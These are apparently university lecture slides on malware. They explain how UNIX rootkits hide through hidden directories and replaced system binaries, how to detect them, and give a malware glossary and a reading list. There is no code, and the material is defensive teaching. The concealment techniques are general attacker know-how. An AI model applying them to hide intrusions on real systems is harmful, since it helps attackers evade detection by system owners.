IT-Security 2 -- Chapter 2 Malware 77

 Hiding Rookit’s Presence on UNIX

§ Create a hidden directory

§ /dev/.lib, /usr/src/.poop and similar
§ Often use invisible characters in directory name
§ Install hacked binaries for system programs such as netstat, ps,
ls, du, login
Can’t detect attacker’s processes,
files or network connections by
running standard UNIX commands!

§ Modified binaries have same checksum as originals

§ What should be used instead of checksum?

§ Some rootkits install additional IRC backdoor

§ See next chapter on botnets

IT-Security 2 -- Chapter 2 Malware 78

 Detecting Rootkit Presence

§ Sad way to find out

§ Run out of physical disk space because of sniffer logs
§ Logs are invisible because du and ls have been hacked!
§ Manual confirmation
§ Reinstall clean ps and see what processes are running
§ Automatic detection
§ Rootkit does not alter the data structures normally used by netstat, ps,
ls, du, ifconfig
§ Host-based intrusion detection can find rootkit files
§ …assuming an updated version of rootkit did not disable your intrusion
detection system!

IT-Security 2 -- Chapter 2 Malware 79

 Malware Terminology

Name Description
Advanced Persistent Sophisticated malware directed at specific business or political targets
Threat (APT) applied persistently and effectively
Adware Advertising integrated in software, often results in pop-up ads or
redirection of a browser to a commercial site
Attack kit Set of tools for generating malware, including propagation and payload
mechanisms
Auto-rooter Malicious hacking tool used to remotely break into machines
Backdoor Any mechanism that bypasses a security check, allows unauthorized
access to functionality in a program or system
Downloader Code that installs other items on a machine, e.g. loads a larger malware
packed after initial infection
Drive-by-downloads Uses code in a compromised web site that exploits a vulnerability in the
browser or browser plugins
Exploit Code specific to exploiting a single vulnerability or set of vulnerabilities
Flooder (DoS engine) Generates large volume of data, e.g. to carry out denial of service attack

IT-Security 2 -- Chapter 2 Malware 80

 Malware Terminology
Name Description
Key logger Captures keystrokes on the infected system
Logic bomb Code inside a malware, triggers when a specific condition is met
Macro virus Uses macro or scripting code, typically embedded in document
Mobile code Code that is portable between different platforms
Rootkit Set of hacker tools used to hide the malware and gain root access
Spam engines Used to send large volumes of unwanted email
Spyware Collects information from a computer and transmits it to another system (e.g.
key strokes, screen shots, network traffic…)
Trojan horse Appears to be useful but also has a secondary malicious purpose
Virus Tries to replicate itself into executable of script code when executed
Worm Runs independently and propagates copies of itself, typically uses software
vulnerability
Bot (Zombie) Activated on an infected machine to gain remote control to launch attacks on
other machines

IT-Security 2 -- Chapter 2 Malware 81

 References

Basic Reading
§ Charles and Shari Pfleeger, Jonathan Marguites: Security in Computing, 2014
§ Chapter 3.2: Malicious code
§ Stallings and Brown: Computer Security, 2015
§ Chapter 6 on malicious software
§ Matt Bishop: Introduction to Computer Security, 2004
§ Chapter 19: Malicious Logic

Further Reading
§ Jon Erickson: Hacking – The art of Exploitation, 2007
§ Chapter 3: Exploitation
§ Exploit data bases
§ bugtraq
§ US-CERT
§ Ken Thompson: Reflections on Trusting Trust, 1984
§ Peter Capek et al: Marry Christmas – An Early Network Worm, 2003
§ Felix Leder, Tillmann Werner: Know Your Enemy: Containing Conficker – To Tame a Malware,
2009
§ P. Porras et al: An analysis of conficker’s logic and rendezvous protocol, 2009

IT-Security 2 -- Chapter 2 Malware 82